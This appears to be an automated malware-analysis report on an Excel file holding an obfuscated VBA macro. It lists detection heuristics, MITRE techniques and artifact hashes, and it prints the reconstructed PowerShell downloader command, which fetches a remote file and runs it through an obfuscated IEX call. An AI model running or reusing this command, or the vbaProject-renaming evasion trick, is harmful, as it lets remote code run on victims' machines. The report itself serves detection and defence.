Verdict: MALICIOUS
Risk Score: 62
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The OOXML file contains a VBA macro that is obfuscated using multiple replace functions. The macro attempts to download and execute a file from the URL 'https://www.mediafire.com/file/b987f1i3css0lhl/4.txt/file'. The reconstructed command is 'iwr -uri https://www.mediafire.com/file/b987f1i3css0lhl/4.txt/file -UseB -UseDefaultCredentials | &('MMM'.replace('MMM','I')+'dildo'.replace('dildo','EX'))', indicating a downloader functionality.
Heuristics (3)
- VBA project part renamed to evade filename detection (severity: high, OOXML_VBA_PROJECT_RENAMED): The VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
- VBA project inside OOXML (severity: medium, OOXML_VBA): Document contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: xl/jdfhdjf.+_--___-_-).
- Embedded URL (severity: info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: https://www.mediafire.com/file/b987f1i3css0lhl/4.txt/file
Extracted artifacts (2)
Files carved from inside the sample during analysis.
| Filename | SHA-256 | Kind | Source | Size |
|---|---|---|---|---|
| macros.bas | b704d320b2b52436a5240c07cfb32dd6b7c6b19737e1390a64504e38708df986 | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 10382 bytes |
| vbaProject_00.bin | 8354f7c40b6b08a6804efb86a3bfc89d43567239b6d10ca63e204daf8fd4c044 | vba-project | OOXML VBA project: xl/jdfhdjf.+_--___-_- | 20480 bytes |